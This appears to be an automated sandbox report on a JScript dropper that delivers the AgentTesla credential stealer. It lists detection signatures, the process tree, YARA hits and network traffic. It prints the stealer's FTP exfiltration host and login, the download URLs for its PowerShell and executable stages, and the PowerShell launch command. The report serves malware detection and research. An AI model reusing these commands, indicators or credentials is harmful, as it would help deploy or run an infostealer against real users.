
Windows Analysis Report
PO_111101111001.js

Overview

General Information

Sample name: PO_111101111001.js
Analysis ID: 1641301
MD5: 984ab95962169d6866f83e5ac3a18dcf
SHA1: a8878632a281723efcfab0dba45bb8bde09f0ca7
SHA256: c5963972b61874eb1381324ed1bfefa927fc2acacc6ad789356e3bc32b92ebd1
Tags: AgentTesla, js, user-abuse_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
PE file contains section with special chars
PE file has nameless sections
Potential obfuscated javascript found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)
  • System is w10x64
  • wscript.exe (PID: 7260 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • QWQWSAADAF.exe (PID: 2976 cmdline: "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe" MD5: 509DA2F325053AC8CFC07C6EDDE04DE6)
        • aspnet_compiler.exe (PID: 5376 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{
  "Exfil Mode": "FTP",
  "Host": "ftp://176.65.144.3",
  "Username": "admin",
  "Password": "Admin56@@"
}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
12.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
12.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
12.2.aspnet_compiler.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
  • 0x345fd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3466f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x346f9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3478b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x347f5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x34867:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x348fd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3498d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.aspnet_compiler.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen |
  • 0x31783:$s2: GetPrivateProfileString
  • 0x30d7a:$s3: get_OSFullName
  • 0x32505:$s5: remove_Key
  • 0x326e8:$s5: remove_Key
  • 0x335e8:$s6: FtpWebRequest
  • 0x345df:$s7: logins
  • 0x34b51:$s7: logins
  • 0x37834:$s7: logins
  • 0x37914:$s7: logins
  • 0x39269:$s7: logins
  • 0x384ae:$s9: 1.85 (Hash, version 2, native byte-order)
11.2.QWQWSAADAF.exe.3fd95b0.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

                    System Summary

Source: Network Connection; Author: frack113, Florian Roth; Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7260, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49721
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", ProcessId: 7260, ProcessName: wscript.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe, ParentProcessId: 2976, ParentProcessName: QWQWSAADAF.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 5376, ProcessName: aspnet_compiler.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7260, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49721
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", ProcessId: 7260, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7260, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", ProcessId: 8152, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-18T08:03:19.242426+0100 | 2018856 | 1 | A Network Trojan was detected | 176.65.144.3 | 80 | 192.168.2.4 | 49721 | TCP


                    AV Detection

Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dll; Avira: detection malicious, Label: HEUR/AGEN.1300034
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://176.65.144.3", "Username": "admin", "Password": "Admin56@@"}
Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dll; ReversingLabs: Detection: 70%
Source: PO_111101111001.js; ReversingLabs: Detection: 27%
Source: Binary string: WASCDZF.pdbTFnF source: QWQWSAADAF.exe, 0000000B.00000000.1339764750.00000000003B2000.00000002.00000001.01000000.0000000A.sdmp, QWQWSAADAF.exe.9.dr
Source: Binary string: WASCDZF.pdb source: QWQWSAADAF.exe, 0000000B.00000000.1339764750.00000000003B2000.00000002.00000001.01000000.0000000A.sdmp, QWQWSAADAF.exe.9.dr

                    Software Vulnerabilities

Source: PO_111101111001.js; Return value: ['"WScript.Shell"', '"Failed to execute PowerShell script: "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']
Source: PO_111101111001.js; Argument value: ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Failed to execute PowerShell script: "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']
Source: PO_111101111001.js; Return value: ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Failed to execute PowerShell script: "', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']
Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Code function: 4x nop then jmp 00CF4CA7h (11_2_00CF4B20)
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe; Code function: 4x nop then jmp 00CF4D0Eh (11_2_00CF4B20)

                    Networking

Source: Network traffic; Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 176.65.144.3:80 -> 192.168.2.4:49721
Source: C:\Windows\System32\wscript.exe; Network Connect: 176.65.144.3 80
Source: PO_111101111001.js; Return value: ['"http://176.65.144.3/dev/devil.ps1"']
Source: PO_111101111001.js; Argument value: ['"http://176.65.144.3/dev/devil.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']
Source: PO_111101111001.js; Argument value: ['"GET","http://176.65.144.3/dev/devil.ps1",false']
Source: PO_111101111001.js; Return value: ['"http://176.65.144.3/dev/devil.ps1"', '"MSXML2.XMLHTTP"']
Source: global traffic; TCP traffic: 192.168.2.4:65080 -> 162.159.36.2:53
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Tue, 18 Mar 2025 07:03:22 GMT; Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30; Last-Modified: Tue, 11 Mar 2025 15:54:49 GMT; ETag: "3be00-630131bd532ab"; Accept-Ranges: bytes; Content-Length: 245248; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload
Source: global traffic; HTTP traffic detected: GET /dev/DEV.exe HTTP/1.1; Host: 176.65.144.3; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; ASN Name: PALTEL-ASPALTELAutonomousSystemPS
Source: unknown; DNS query: name: ip-api.com
Source: global traffic; HTTP traffic detected: GET /dev/devil.ps1 HTTP/1.1; Accept: */*; Accept-Language: en-ch; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: 176.65.144.3; Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic; DNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa
Source: QWQWSAADAF.exe, 0000000B.00000002.1365843658.00000000027E3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://176.65.144.3
Source: QWQWSAADAF.exe, 0000000B.00000002.1365843658.000000000277D000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1365843658.000000000277B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://176.65.144.3/dev/DEV.exe
Source: QWQWSAADAF.exe, 0000000B.00000002.1365843658.0000000002781000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://176.65.144.3/dev/DEV.exeP
Source: wscript.exe, 00000000.00000003.1277176651.000001B28EBE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1287676331.000001B28EBE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1276110163.000001B28EBE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1287267702.000001B28EBE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277355226.000001B28EBE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277719320.000001B28EBE7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://176.65.144.3/dev/devil.ps1
Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003276000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000009.00000002.1361439763.000001BED1E03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1361439763.000001BED1C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1BE1000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1365843658.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1BE1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1361439763.000001BED1E03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1361439763.000001BED1C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, xljC6U.cs | .Net Code: YPw7g

System Summary

Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8152, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: QWQWSAADAF.exe.9.dr | Static PE information: section name: .-L3/F
Source: QWQWSAADAF.exe.9.dr | Static PE information: section name:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF28D0
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF0848
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF702B
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF8430
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF81C8
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF11EF
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF6AC0
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF28C0
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF8482
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF0847
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF6980
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF81BF
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF83E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 12_2_01604AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 12_2_0160AD18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 12_2_01603EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 12_2_016041F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 12_2_06962348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 12_2_069659A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 12_2_06960040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 12_2_069652B8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RUNPEE.dll 480FE5832E1E06DE33096FCE7DD5E90BB1EC7203BF96664CF50E004B66A33854
Source: PO_111101111001.js | Initial sample: Strings found which are bigger than 50
Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: Process Memory Space: powershell.exe PID: 8152, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: QWQWSAADAF.exe.9.dr | Static PE information: Section: .-L3/F ZLIB complexity 1.0014322916666667
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, 9O2OLI.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, hdYUG.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, LGBZ4N2f.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, F8OmG.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, Bgo.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, k7FmsUgnvL.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, dVjkZ3EEsen.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, dVjkZ3EEsen.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, dVjkZ3EEsen.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpack, dVjkZ3EEsen.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winJS@8/8@3/2
